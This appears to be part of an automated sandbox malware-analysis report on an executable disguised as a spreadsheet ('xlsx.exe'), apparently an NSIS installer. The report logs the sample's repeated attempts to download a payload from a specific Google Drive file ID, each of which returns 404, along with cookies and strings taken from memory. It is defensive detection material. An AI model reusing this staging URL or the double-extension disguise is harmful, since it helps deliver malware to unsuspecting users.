Source: global traffic	HTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7otclPp6kUkj9Txte22X9qcUBAFq6kX4UIMZ89XpCixvR11jxcht3Cm_q4Y8I59C_zContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:05:22 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-QAxJTfIpNBUuOSTsK97zCg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU; expires=Tue, 17-Jun-2025 17:05:22 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC65-DEoJXWYw4Izsi7h2NiMRHNiFvluyONc8W2NVZI2wKz7M8kG3U6XTPZ4NWYWCzOjContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:05:37 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-MxBkN0_e0DXXEWZnj9Toqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5Cg-gtBAGLfPXSXvdGgeRxlrSs786ui4JbkTpH2jwIBoqnyKIokNII-bibXZaZeYjkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:05:53 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-sIQsjuBS7kXdZycCF__4iA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC78hZ8vB7uaRS0PlP3iyi3CD-5-RkxIfCt2uvNptsoSiYbQG7QrUNUu0GsYovkTm2wCContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:06:08 GMTPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-7amad5-KjK-4UpjSGr5GEQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6RcJKxOcZ8kVuxTP6nHEOVSCpVeF7qhjsc4seXpcbgwBUOQR6fY5oUDMEKR-h0w8_JContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:06:24 GMTPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-2Jas3iTkHt7nF5dB3sLULA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5rPh166RMBB6xpz6w9niqgzREj2_SB50KwPB0eZ8B9vUd3N2DS24KTG5jiHA6MVSxaContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:06:39 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-Ef0-Lv55KyzmQgf7KTlyBg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6wDUyyhJyymcLpAnb-Y-MR213vNES_SiwhEusWybTLMaMid1-ffFKZRjKiB9ZguzqGContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:06:55 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-7LMe386rfH91p3LmUy6pBA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7aweZMacvmUf5gu6P_92Y143zJ-IcQZHTqpX_CLjH8f2Fe9dwf2xiPzQXE8Z902rRRContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:07:11 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-aq1AFrrxZ3LER01lHV6nWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7UPMuB80rDbALWgk-Q7HuTIc42Nb5-mH2sXTEMr0Li_jKeAWNBWVH4BMkUbzxkHQROContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:07:27 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-PMfDxcEX284aRXl0mEZaDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7lhzDMhaIkxEICzsWwrnilFgThikntNQtqZZmlRb6jEUxRL1uwozKZj3VYDFEEAJuPContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:07:43 GMTPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-IXILVF3bU-z09tFmVcjZ_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7vwFbp_BZu8CrE68JE2Hu6OguQprRj7PgtTdeP7oIriTuX45D6dTJVK-ex2g9L8-GGContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:07:59 GMTContent-Security-Policy: script-src 'nonce-OmsC__QuN2BMpl_AVgvkQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close

Source: 09-FD-94.03.60.175.07.xlsx.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731190068.000000000744C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884426323.0000000007454000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
